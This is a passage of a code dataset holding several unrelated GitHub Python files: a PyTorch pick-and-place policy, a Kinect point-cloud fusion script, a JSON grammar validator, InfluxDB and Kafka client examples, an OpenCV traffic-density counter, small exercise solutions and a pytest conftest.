{action_num}: ({action[0]}, {[entity_to_seq_string(ent) for ent in action[1:]]} ) \\n'\n else:\n solution_str = f'Unsolved problem {step} : {logic_statement_to_seq_string(input_problem[\"observation\"][\"objectives\"][0])} \\n \\n'\n\n log_text('solution', solution_str, 
True)\n\n","repo_name":"TomaszOdrzygozdz/AdaSubS_colab","sub_path":"jobs/int/job_solve_int.py","file_name":"job_solve_int.py","file_ext":"py","file_size_in_byte":9062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39727331378","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom agents.agents_3d.tp.dqn_3d_tp import DQN3DTP\n\nclass Policy3DTP(DQN3DTP):\n def __init__(self, workspace, heightmap_size, device, lr=1e-4, gamma=0.9, sl=False, num_primitives=1,\n patch_size=24, num_rz=8, rz_range=(0, 7*np.pi/8)):\n super().__init__(workspace, heightmap_size, device, lr, gamma, sl, num_primitives, patch_size, num_rz, rz_range)\n\n # def update(self, batch):\n # batch_size = len(batch)\n # divide_factor = batch_size\n # small_batch_size = batch_size//divide_factor\n # loss = 0\n # for i in range(divide_factor):\n # small_batch = batch[small_batch_size*i:small_batch_size*(i+1)]\n # self._loadBatchToDevice(small_batch)\n # _, states, obs, action_idx, rewards, next_states, next_obs, non_final_masks, step_lefts, is_experts = self._loadLossCalcDict()\n # output = self.forwardFCN(states, obs[1], obs[0])\n # output = output.reshape(small_batch_size, -1)\n # target = action_idx[:, 2] * self.heightmap_size * self.heightmap_size + \\\n # action_idx[:, 0] * self.heightmap_size + \\\n # action_idx[:, 1]\n # loss += F.cross_entropy(output, target)/divide_factor\n # self.loss_calc_dict = {}\n #\n # self.place_optimizer.zero_grad()\n # self.pick_optimizer.zero_grad()\n # loss.backward()\n # self.place_optimizer.step()\n # self.pick_optimizer.step()\n #\n # self.loss_calc_dict = {}\n #\n # return loss.item(), torch.tensor(0.)\n\n\n def update(self, batch):\n batch_size = len(batch)\n self._loadBatchToDevice(batch)\n _, states, obs, action_idx, rewards, next_states, next_obs, non_final_masks, step_lefts, is_experts = self._loadLossCalcDict()\n obs, in_hands = obs\n mask_0 = states == 0\n mask_1 = states == 1\n if mask_0.sum():\n obs_0 = obs[mask_0]\n action_idx_0 = action_idx[mask_0]\n\n pick_loss = 0\n for i in range(mask_0.sum()):\n output = self.forwardPick(obs_0[i:i+1]).reshape(1, -1)\n target = action_idx_0[i:i+1, 2] * self.heightmap_size * self.heightmap_size + \\\n action_idx_0[i:i+1, 0] * self.heightmap_size + \\\n action_idx_0[i:i+1, 1]\n pick_loss += F.cross_entropy(output, target)/mask_0.sum()\n\n self.pick_optimizer.zero_grad()\n pick_loss.backward()\n self.pick_optimizer.step()\n else:\n pick_loss = torch.tensor(0)\n if mask_1.sum():\n obs_1 = obs[mask_1]\n in_hands_1 = in_hands[mask_1]\n action_idx_1 = action_idx[mask_1]\n\n place_loss = 0\n for i in range(mask_1.sum()):\n output = self.forwardPlace(in_hands_1[i:i+1], obs_1[i:i+1]).reshape(1, -1)\n target = action_idx_1[i:i+1, 2] * self.heightmap_size * self.heightmap_size + \\\n action_idx_1[i:i+1, 0] * self.heightmap_size + \\\n action_idx_1[i:i+1, 1]\n place_loss += F.cross_entropy(output, target)/mask_1.sum()\n\n self.place_optimizer.zero_grad()\n place_loss.backward()\n self.place_optimizer.step()\n else:\n place_loss = torch.tensor(0)\n\n self.loss_calc_dict = {}\n\n return (pick_loss.item(), place_loss.item()), torch.tensor(0.)","repo_name":"pointW/equi_q_corl21","sub_path":"agents/agents_3d/tp/policy_3d_tp.py","file_name":"policy_3d_tp.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"22666291700","text":"import click\nimport os\nimport numpy as 
np\nimport pickle as pkl\nimport glob\nimport cv2\nimport open3d as o3d\nimport matplotlib.pyplot as plt\n\nfrom kintools.core import camera\nfrom kintools.hardware import utils\n\n\ndef preprocess(d):\n d = d / 1000\n d = cv2.medianBlur(d, 5)\n d[d > 1.0] = 0\n # d[d < 0.2] = 0\n return d\n\n\ndef to_homogeneous(x):\n a = np.zeros((x.shape[0], 4))\n a[:, :3] = x\n a[:, 3] = 1\n return a\n\n\n@click.command()\n@click.option(\"--input_file\", \"-i\", default=\"\")\n@click.option(\"--output_folder\", \"-o\", default=\"\")\ndef main(input_file, output_folder):\n calibration = utils.load_calibration(\n \"/home/rstrudel/code/kinect2-utilities/calibration/paris_kinect2\"\n )\n ir_params = calibration[\"ir\"]\n camera_matrix = ir_params[\"cameraMatrix\"]\n dist = ir_params[\"distortionCoefficients\"]\n fx, fy, cx, cy = (\n camera_matrix[0, 0],\n camera_matrix[1, 1],\n camera_matrix[0, 2],\n camera_matrix[1, 2],\n )\n\n T_cam_tracker = np.array(\n [\n [0.997871, -0.006405, -0.064908, 0.034571],\n [-0.065077, -0.031177, -0.997393, -0.036484],\n [0.004364, 0.999493, -0.031527, 0.019005],\n [0.000000, 0.000000, 0.000000, 1.000000],\n ]\n )\n # T_cam_tracker[:3, :3] = T_cam_tracker[:3, :3]\n\n files = glob.glob(os.path.join(\"snap_depth_tracker\", \"*.pkl\"))\n files = sorted(files)\n cloud = np.zeros((0, 3))\n for i, input_file in enumerate(files):\n snap = pkl.load(open(input_file, \"rb\"))\n depth = snap[\"depth\"]\n T_tracker = snap[\"tracker\"]\n # if i == 0:\n # T_ref = T_tracker\n T_tracker_base = np.linalg.inv(T_tracker)\n # print(np.linalg.norm(T_tracker_ref[:3, 3]))\n depth = preprocess(depth)\n\n depth_pts_2d, depth_info = camera.depth_to_points(depth)\n depth_pts_3d = camera.unproject(depth_pts_2d, fx, fy, cx, cy)\n depth_pts_hom = to_homogeneous(depth_pts_3d)\n depth_pts_aligned = np.zeros_like(depth_pts_hom)\n for k, x in enumerate(depth_pts_hom):\n depth_pts_aligned[k] = (T_tracker_base @ T_cam_tracker).dot(x)\n # depth_pts_aligned[k] = x\n cloud = np.concatenate((cloud, depth_pts_aligned[:, :3]))\n np.savetxt(\n os.path.join(output_folder, \"res{}.npy\".format(i)),\n depth_pts_aligned[:, :3],\n )\n\n np.savetxt(os.path.join(output_folder, \"res_fusion.npy\"), cloud)\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(cloud)\n pcd_down = pcd.voxel_down_sample(0.02)\n o3d.visualization.draw_geometries([pcd_down])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rjgpinel/kinect2-utilities","sub_path":"kintools/reconstruct.py","file_name":"reconstruct.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12865655810","text":"import json\nimport os\n\nclass SyntaxError(Exception): ...\nclass IntegrityError(Exception): ...\n\n\nclass LexorSyntax:\n\n @staticmethod\n def _load(file_name):\n with open(file_name) as f:\n return json.load(f)\n\n @staticmethod\n def _assert_keys(dict_name, dict, keys):\n for key in keys:\n if not key in dict:\n raise SyntaxError(f'No \"{key}\" section present in {dict_name}')\n\n @staticmethod\n def _assert_sections(data):\n LexorSyntax._assert_keys('syntax file', data, [\n 'CONFIG', 'SYNTAX'\n ])\n LexorSyntax._assert_keys('CONFIG section', data['CONFIG'], [\n 'main', 'name', 'version', 'prepend_with', 'append_with'\n ])\n LexorSyntax._assert_keys('SYNTAX section', data['SYNTAX'], [\n 'PHRASES', 'WORDS', 'SYLLABLES', 'LETTERS'\n ])\n\n @staticmethod\n def _process_comments(data):\n has_comments = False\n if isinstance(data, 
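
Editor's note: reconstruct.py relies on kintools' camera.unproject and applies the tracker pose point by point. A hedged sketch of the pinhole back-projection that helper presumably performs, plus a batched matrix product that could replace the per-point Python loop used above:

import numpy as np

def unproject(u, v, z, fx, fy, cx, cy):
    # Pinhole model: pixel (u, v) at depth z maps to camera-frame XYZ.
    return np.stack([(u - cx) * z / fx, (v - cy) * z / fy, z], axis=-1)

# Applying a 4x4 pose to all homogeneous points at once instead of looping:
pts_hom = np.array([[0.1, 0.2, 1.0, 1.0],
                    [0.0, -0.1, 0.8, 1.0]])
T = np.eye(4)                      # stand-in for T_tracker_base @ T_cam_tracker
aligned = (T @ pts_hom.T).T[:, :3]
print(aligned)
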
dict):\n for name in data:\n if name == '@COMMENT':\n has_comments = True\n else:\n LexorSyntax._process_comments(data[name])\n if has_comments:\n del data['@COMMENT']\n\n @staticmethod\n def _process_imports(syntax, import_path):\n for name in syntax:\n section = syntax[name]\n if '@IMPORT' in section:\n paths = section['@IMPORT']\n for path in paths:\n path = os.path.join(import_path, path)\n data = LexorSyntax._load(path)\n section.update(data)\n del section['@IMPORT']\n\n @staticmethod\n def _assert_phrases_syntax(phrases):\n for name, phrase in phrases.items():\n if not name.startswith('P_'):\n raise SyntaxError(f'Phrase names must start with \"P_\" in phrase \"{name}\"')\n if not 'space' in phrase:\n phrase['space'] = True\n if not isinstance(phrase['space'], bool):\n raise SyntaxError(f'Attribute \"space\" must be boolean in phrase \"{name}\"')\n if not 'call' in phrase:\n phrase['call'] = False\n\n selector_phrase_count = 0\n if 'or' in phrase: selector_phrase_count += 1\n if 'and' in phrase: selector_phrase_count += 1\n if 'or+' in phrase: selector_phrase_count += 1\n if 'sequence' in phrase: selector_phrase_count += 1\n\n if selector_phrase_count == 0:\n raise SyntaxError(f'Phrase must specify one of [and, or, or+, sequence] attributes in phrase \"{name}\"')\n if selector_phrase_count > 1:\n raise SyntaxError(f'Phrase can not contain more than one of [and, or, or+] attributes in phrase \"{name}\"')\n if ('or' in phrase and not isinstance(phrase['or'], list)) or \\\n ('and' in phrase and not isinstance(phrase['and'], list)):\n raise SyntaxError(f'Attributes \"and\", \"or\" must be arrays in phrase \"{name}')\n if 'or+' in phrase and 'max' not in phrase:\n raise SyntaxError(f'Phrases with attribute \"or+\" must specify \"max\" in phrase \"{name}\"')\n\n @staticmethod\n def _assert_words_syntax(words):\n for name, word in words.items():\n if not name.startswith('W_'):\n raise SyntaxError(f'Word names must start with \"W_\" in word \"{name}\"')\n if not 'syllables' in word:\n raise SyntaxError(f'Word must specify \"syllables\": [] in word \"{name}\"')\n if not isinstance(word['syllables'], list):\n raise SyntaxError(f'Attribute \"syllables\" must be an array in word \"{name}')\n if not 'call' in word:\n word['call'] = False\n\n @staticmethod\n def _assert_syllables_syntax(syllables):\n for name, syllable in syllables.items():\n if not name.startswith('S_'):\n raise SyntaxError(f'Syllable names must start with \"S_\" in syllable \"{name}\"')\n if not 'letters' in syllable:\n raise SyntaxError(f'Word must specify \"letters\": [] in syllable \"{name}\"')\n if not isinstance(syllable['letters'], str):\n raise SyntaxError(f'Attribute \"letters\" must be array in syllable \"{name}')\n if not 'max' in syllable:\n raise SyntaxError(f'Word must specify \"max\": in syllable \"{name}\"')\n if not isinstance(syllable['max'], int):\n raise SyntaxError(f'Attribute \"max\" must be an integer in syllable \"{name}')\n if not 'inverse' in syllable:\n syllable['inverse'] = False\n if not isinstance(syllable['inverse'], bool):\n raise SyntaxError(f'Attribute \"inverse\" must be a bool in syllable \"{name}')\n\n @staticmethod\n def _assert_letters_syntax(letters):\n for name, letter in letters.items():\n if not name.startswith('L_'):\n raise SyntaxError(f'Letters names must start with \"L_\" in letters \"{name}\"')\n if not isinstance(letter, str):\n raise SyntaxError(f'Letters\" must be string in \"{name}')\n\n @staticmethod\n def _assert_integrity(syn):\n phrases = syn['PHRASES']\n words = 
syn['WORDS']\n        syllables = syn['SYLLABLES']\n        letters = syn['LETTERS']\n\n        for name, phrase in phrases.items():\n            keyname = (\n                'and' if 'and' in phrase else\n                'or' if 'or' in phrase else\n                'or+' if 'or+' in phrase else\n                'sequence' if 'sequence' in phrase else None\n            )\n            for ref in phrase[keyname]:\n                if ref not in phrases and ref not in words:\n                    raise IntegrityError(f'{ref} is not resolvable in PHRASES or WORDS')\n\n        for name, word in words.items():\n            for ref in word['syllables']:\n                if ref not in syllables.keys():\n                    raise IntegrityError(f'{ref} is not resolvable in SYLLABLES')\n\n        for name, syllable in syllables.items():\n            if syllable['letters'] not in letters.keys():\n                raise IntegrityError(f'{syllable[\"letters\"]} is not resolvable in LETTERS')\n\n    @staticmethod\n    def get_syntax(syntax_file_name):\n        import_path = os.path.dirname(syntax_file_name)\n        data = LexorSyntax._load(syntax_file_name)\n\n        try:\n            LexorSyntax._assert_sections(data)\n            syn = data['SYNTAX']\n            LexorSyntax._process_imports(syn, import_path)\n            LexorSyntax._process_comments(data)\n            LexorSyntax._assert_phrases_syntax(syn['PHRASES'])\n            LexorSyntax._assert_words_syntax(syn['WORDS'])\n            LexorSyntax._assert_syllables_syntax(syn['SYLLABLES'])\n            LexorSyntax._assert_letters_syntax(syn['LETTERS'])\n            LexorSyntax._assert_integrity(syn)\n        except SyntaxError as e:\n            print(f'Syntax error in \"{syntax_file_name}\": {str(e)}')\n            exit(1)\n        except IntegrityError as e:\n            print(f'Integrity error in \"{syntax_file_name}\": {str(e)}')\n            exit(2)\n\n        return data\n\n","repo_name":"apodgorny/Lexor","sub_path":"lexor/LexorSyntax.py","file_name":"LexorSyntax.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"29084101768","text":"from influxdb_client import InfluxDBClient, Point\nfrom influxdb_client.client.query_api import QueryOptions\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nwith InfluxDBClient(url=\"http://localhost:8086\", token=\"my-token\", org=\"my-org\", debug=True) as client:\n\n    \"\"\"\n    Define callback to process profiler results.\n    \"\"\"\n    class ProfilersCallback(object):\n        def __init__(self):\n            self.records = []\n\n        def __call__(self, flux_record):\n            self.records.append(flux_record.values)\n\n\n    callback = ProfilersCallback()\n\n    write_api = client.write_api(write_options=SYNCHRONOUS)\n\n    \"\"\"\n    Prepare data\n    \"\"\"\n    _point1 = Point(\"my_measurement\").tag(\"location\", \"Prague\").field(\"temperature\", 25.3)\n    _point2 = Point(\"my_measurement\").tag(\"location\", \"New York\").field(\"temperature\", 24.3)\n    write_api.write(bucket=\"my-bucket\", record=[_point1, _point2])\n\n    \"\"\"\n    Pass callback to QueryOptions\n    \"\"\"\n    query_api = client.query_api(\n        query_options=QueryOptions(profilers=[\"query\", \"operator\"], profiler_callback=callback))\n\n    \"\"\"\n    Perform query\n    \"\"\"\n    tables = query_api.query('from(bucket:\"my-bucket\") |> range(start: -10m)')\n\n    for profiler in callback.records:\n        print(f'Custom processing of profiler result: {profiler}')\n","repo_name":"influxdata/influxdb-client-python","sub_path":"examples/query_with_profilers.py","file_name":"query_with_profilers.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"}
{"seq_id":"31266243131","text":"import sys\n\nactive = set()\nfor i, line in enumerate(open(sys.argv[1])):\n    for j, ch in enumerate(line.strip()):\n        if ch == '#':\n            active.add((0, 0, i, j))\n\ndef 
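
Editor's note: the InfluxDB example registers a callable object as the profiler hook; any instance with __call__ works. The same pattern in isolation, with a hypothetical record stream standing in for Flux profiler results:

class Collector:
    def __init__(self):
        self.records = []

    def __call__(self, record):              # invoked once per streamed record
        self.records.append(record)

collect = Collector()
for r in ({'profiler': 'query'}, {'profiler': 'operator'}):
    collect(r)
print(collect.records)
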
simulate(active, dirs):\n for step in range(6):\n nns_count = {}\n for i, j, k, l in active:\n for di, dj, dk, dl in dirs:\n coord2 = i+di, j+dj, k+dk, l+dl\n nns_count[coord2] = nns_count.get(coord2, 0) + 1\n\n new_active = set()\n for coord in active:\n if nns_count.get(coord, 0) in [2, 3]:\n new_active.add(coord)\n for coord, ct in nns_count.items():\n if coord not in active and ct == 3:\n new_active.add(coord)\n active = new_active\n print(len(active))\n\ndirs_1 = [(0, di, dj, dk) for di in range(-1, 2) for dj in range(-1, 2) for dk in range(-1, 2)]\ndirs_1 = [dijk for dijk in dirs_1 if dijk != (0, 0, 0, 0)]\nsimulate(active, dirs_1)\n\ndirs_2 = [(di, dj, dk, dl) for di in range(-1, 2) for dj in range(-1, 2) for dk in range(-1, 2) for dl in range(-1, 2)]\ndirs_2 = [dijk for dijk in dirs_2 if dijk != (0, 0, 0, 0)]\nsimulate(active, dirs_2)\n","repo_name":"erikbern/advent-of-code-2020","sub_path":"day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"7811358408","text":"sum = 0 \r\nstudent = []\r\napple = []\r\nn = int(input())\r\nfor _ in range(n):\r\n x,y = map(int,input().split())\r\n student.append(x)\r\n apple.append(y)\r\n\r\nfor i in range(n):\r\n if student[i] > apple[i]:\r\n sum += apple[i]\r\n else:\r\n sum += apple[i] % student[i]\r\nprint(sum)","repo_name":"shotgun1107/coding-test","sub_path":"백준/Bronze/10833. 사과/사과.py","file_name":"사과.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34275403467","text":"class Exercises:\n def __init__(self, topic, course_name, judge_contest_link, problems):\n self.topic = topic\n self.course_name = course_name\n self.judge_contest_link = judge_contest_link\n self.problems = [*problems]\n\n def get_info(self):\n info = f'Exercises: {self.topic}\\n' \\\n f'Problems for exercises and homework for the \"{self.course_name}\" course @ SoftUni.' \\\n f'\\nCheck your solutions here: {self.judge_contest_link}\\n'\n\n for p in range(len(self.problems)):\n if p == len(self.problems) - 1:\n info += f'{p + 1}. {self.problems[p]}'\n else:\n info += f'{p + 1}. 
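
Editor's note: the Conway-cube solver above never scans the whole grid; each active cell adds 1 to a dictionary entry for every neighbour, and those counts alone decide the next generation. The same trick on a 2D blinker, small enough to check by hand:

active = {(0, 0), (0, 1), (0, 2)}                 # horizontal blinker
dirs = [(di, dj) for di in (-1, 0, 1) for dj in (-1, 0, 1) if (di, dj) != (0, 0)]
counts = {}
for i, j in active:
    for di, dj in dirs:
        counts[(i + di, j + dj)] = counts.get((i + di, j + dj), 0) + 1
nxt = {c for c in active if counts.get(c, 0) in (2, 3)} | \
      {c for c, n in counts.items() if c not in active and n == 3}
print(sorted(nxt))                                # flips to a vertical blinker
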
{self.problems[p]}\\n'\n return info\n\n\nnum = 1\nitems = []\nwhile True:\n line_input = input()\n if line_input == 'go go go':\n break\n\n topic, course_name, judge_contest_link, all_problems = list(line_input.split(' -> '))\n problems = all_problems.split(', ')\n items.append(Exercises(topic, course_name, judge_contest_link, problems))\n\nfor i in items:\n print(i.get_info())\n\n\n\n","repo_name":"Dochko0/Python","sub_path":"Python_Fundamentals/06_Object_And_Classes/task_object_and_classes/d_exercises.py","file_name":"d_exercises.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3987668760","text":"# coding: utf-8\nfrom kafka import KafkaProducer\n\nimport time\n\nproducer = KafkaProducer(bootstrap_servers='localhost:9092')\n\nwith open('/data/Log.log', 'r') as f:\n for l in f:\n word = l.split(\"`\")[1]\n time.sleep(0.1)\n producer.send('sex', word.encode('utf-8'))\n","repo_name":"Longong/python-kafka","sub_path":"scripts/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29168737151","text":"import cv2\nimport numpy as np\n\n\ndef density_calculation():\n y = 1\n idx = 0\n\n def getcontours_1(img,b): # lane detection\n print(\"getcontours_1\")\n box=b\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if 1500 < area:\n cv2.drawContours(imgContour_1,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n if (3 < objCor < 8):\n box += 1\n objectType = \"OB=%d a=%s\"%(box,area)\n else : objectType = \"NONE\"\n cv2.rectangle(imgContour_1,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour_1,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n print(\"number of objects in line 1\", box)\n return imgContour_1, box\n\n def getcontours_2(img,b): # object detection\n print(\"getcontours_2\")\n box=b\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if (1500 < area):\n cv2.drawContours(imgContour_2,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n if (3 < objCor < 10):\n box += 1\n objectType = \"OB=%d a=%s\"%(box,area)\n else : objectType = \"NONE\"\n cv2.rectangle(imgContour_2,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour_2,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n print(\"number of objects in line 2\", box)\n return (imgContour_2,box)\n\n def getcontours(img,b,s,zz):\n print(\"getcontours\")\n box=b\n idx = s\n img_1 = zz\n contours,hierarchy = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if (15000 < area): # < 20000):\n cv2.drawContours(imgContour,cnt,-1,(255,50,0),2)\n peri = cv2.arcLength(cnt,True)\n aprox = cv2.approxPolyDP(cnt,0.02*peri,False)\n objCor = len(aprox)\n x, y, w, h = cv2.boundingRect(aprox)\n\n rect = cv2.minAreaRect(aprox)\n bbox = cv2.boxPoints(rect)\n bbox = np.int0(bbox)\n cv2.drawContours(img, [bbox], 0, (0, 0, 255), 8)\n\n #print(\"x=%d y=%d w=%d h=%d\" %(x,y,w,h))\n if (3 < objCor < 
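
Editor's note: the producer above replays a log file into the 'sex' topic at roughly ten messages per second. A minimal consumer counterpart, assuming the same local broker; kafka-python's KafkaConsumer here reads from the earliest offset and gives up after five seconds of silence:

from kafka import KafkaConsumer

consumer = KafkaConsumer('sex',
                         bootstrap_servers='localhost:9092',
                         auto_offset_reset='earliest',
                         consumer_timeout_ms=5000)
for msg in consumer:
    print(msg.value.decode('utf-8'))
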
15):\n box += 1;\n objectType = \"lane=%d a=%s\"%(box,area)\n #objectType = \"w=%d h=%d a=%s\" %(w,h,area)\n else : objectType = \"NONE\"\n\n cv2.rectangle(imgContour,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(imgContour,objectType,\n (x+(w//2)-80,y+(h//2)+50),cv2.FONT_HERSHEY_COMPLEX,0.7,(0,0,0),1)\n\n idx += 1\n new_img = img_1[y:y + h, x:x + w]\n #cv2.imshow(\"croped\" + str(idx), new_img)\n cv2.imwrite(str(idx) + '.png', new_img)\n\n cv2.waitKey(15)\n\n\n def capture_live_cam():\n print(\"fetch_live_cam\")\n #cap = cv2.VideoCapture(0)\n for u in range(2):\n cap = cv2.VideoCapture(0)\n ret, imgt = cap.read()\n cv2.imwrite(\"Shapes.png\", imgt)\n\n def fetch_image():\n img = cv2.imread(\"Shapes.png\", -1)\n imgContour = img.copy()\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n imgBlur = cv2.GaussianBlur(imgGray, (7, 7), 1)\n imgCanny = cv2.Canny\\\n (imgBlur, 50, 100)\n cv2.imshow(\"original\", img)\n cv2.imshow(\"canny\", imgCanny)\n return (imgCanny, imgContour, img)\n\n\n #cap = capture_live_cam()\n imgCanny,imgContour,img = fetch_image()\n while y:\n print(\"While1\")\n box = 0\n tri = 0\n getcontours(imgCanny, box, idx, img)\n cv2.waitKey(15)\n boxb = 0\n image = cv2.imread(\"1.png\", -1)\n imgContour_1 = image.copy()\n imgGray_1 = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n imgBlur_1 = cv2.GaussianBlur(imgGray_1, (7, 7), 1)\n imgCanny_1 = cv2.Canny(imgBlur_1, 50, 100)\n imgContour_r,boxb = getcontours_1(imgCanny_1,box)\n #cv2.imshow(\"canny_1\", imgCanny_1)\n \"\"\"#cv2.imshow(\"Lane_1\", imgContour_r)#\"\"\"\n boxa = 0\n image_a = cv2.imread(\"2.png\", -1)\n imgContour_2 = image_a.copy()\n imgGray_2 = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n imgBlur_2 = cv2.GaussianBlur(imgGray_2, (7, 7), 1)\n imgCanny_2 = cv2.Canny(imgBlur_2, 50, 100)\n imgContour_ra,boxa = getcontours_2(imgCanny_2, box)\n #cv2.imshow(\"canny_2\", imgCanny_2)\n\n \"\"\"#cv2.imshow(\"Lane_2\", imgContour_ra)\n cv2.imshow(\"Con\", imgContour)\"\"\"#\n y = 0\n\n #if(cv2.waitKey()):\n #y = 0\n #cv2.destroAllWindows()\n return(img, boxa, boxb)\n\n\n#i, a, b = density_calculation()\n#print(\"a:\", a)\n#print(\"b:\", b)\n","repo_name":"uniqueullas/Density-Based-Traffic-Controll","sub_path":"base_file.py","file_name":"base_file.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16388937291","text":"# -*-coding:utf-8-*-\nfrom typing import List\n\nimport pytest\nimport yaml\nimport sys\n\nfrom pytest_demo3.calc import Calculator\n\nsys.path.append('../../..')\nprint(sys.path)\n\nimport os\n\n\n# 作用域:session>module>class>function\n# function:方法或函数级别调用一次\n# @pytest.fixture(scope='function')\n# class:类级别调用一次\n# @pytest.fixture(scope='class')\n# module:模块级别调用一次\n# @pytest.fixture(scope='module')\n# session:多个文件只调用一次\n@pytest.fixture(scope='session')\ndef connectDB():\n print(\"连接数据库操作\")\n yield\n print(\"断开数据库连接\")\n\n\n@pytest.fixture(scope='class')\ndef get_calc():\n print(\"获取计算器实例\")\n calc = Calculator()\n return calc\n\n\n# 通过os.path.dirname(__file__)能够获取当前文件所在的目录\nyamlfilepath = os.path.dirname(__file__) + \"/data/calc.yaml\"\n# ./data/calc.yaml ====>.代表当前路径,也就是说你在哪个路径下执行测试文件,就叫做当前路径\n# 读取文件\nwith open(yamlfilepath, encoding='utf-8') as f:\n # safe_load()只能一次\n data = yaml.safe_load(f)\n # 获取add下的datas里的数据\n adddatas = data['add']['datas']\n print(adddatas)\n # 获取add下的myid里的数据\n myid = data['add']['myid']\n print(myid)\n # 获取div下的datas里的数据\n adddatas1 = data['div']['datas']\n print(adddatas1)\n # 
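
Editor's note: density_calculation interleaves capture, preprocessing and contour filtering. The core Canny, findContours, approxPolyDP, boundingRect pipeline in isolation, run on a synthetic white square so it needs no camera (this assumes OpenCV 4's two-value findContours signature):

import cv2
import numpy as np

img = np.zeros((200, 200), np.uint8)
cv2.rectangle(img, (50, 50), (150, 150), 255, -1)       # one filled white square
edges = cv2.Canny(img, 50, 100)
contours, _ = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
for cnt in contours:
    if cv2.contourArea(cnt) > 100:
        approx = cv2.approxPolyDP(cnt, 0.02 * cv2.arcLength(cnt, True), True)
        x, y, w, h = cv2.boundingRect(approx)
        print(x, y, w, h)                               # roughly the square's bounds
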
获取div下的myid里的数据\n myid1 = data['div']['myid']\n print(myid1)\n\n\n@pytest.fixture(params=adddatas, ids=myid)\ndef get_datas(request):\n data = request.param\n print(f\"request.param的测试数据是:{data}\")\n return data\n\n\n# 如果不去定义这些hook函数,它会按照pytest默认的规则去运行测试用例\n# 如果在conftest.py文件里面定义的这些hook函数,名字和参数要与官网定义的一模一样\n# 在hook函数内部实现要改写的规则\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n \"\"\"Called after collection has been performed. May filter or re-order\n the items in-place.\n\n :param _pytest.main.Session session: The pytest session object.\n :param _pytest.config.Config config: The pytest config object.\n :param List[_pytest.nodes.Item] items: List of item objects.\n \"\"\"\n print(\"items\")\n print(items)\n # 测试用例反转\n items.reverse()\n # 测试用例参数的编码格式改写\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n # 如果测试用例里面有字符,则自动的添加一些标签\n if 'add' in item.nodeid:\n item.add_marker(pytest.mark.add)\n elif 'div' in item.nodeid:\n item.add_marker(pytest.mark.div)\n if 'sub' in item.nodeid:\n item.add_marker(pytest.mark.sub)\n\n\n# parser:用户命令行参数与ini文件值得解析器\ndef pytest_addoption(parser):\n mygroup = parser.getgroup(\"hogwarts\") # group将下面所有的option都展示在这个group下\n mygroup.addoption(\"--env\", # 注册一个命令行选项\n default='test', # 默认值\n dest='env', # 存储的变量\n help='set your run env' # 参数说明\n )\n mygroup.addoption(\"--des\", # 注册一个命令行选项\n default='cjj', # 默认值\n dest='cjj', # 存储的变量\n help='set your param' # 参数说明\n )\n\n\n# 获取参数\n@pytest.fixture(scope='session')\ndef cmdoption(request):\n return request.config.getoption(\"--env\", default='test')\n","repo_name":"twinklecjj/cjj_python","sub_path":"python_pytest/pytest_demo3/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6801790736","text":"#!/usr/bin/env python3\nimport webbrowser\n\nfrom dialogs.search 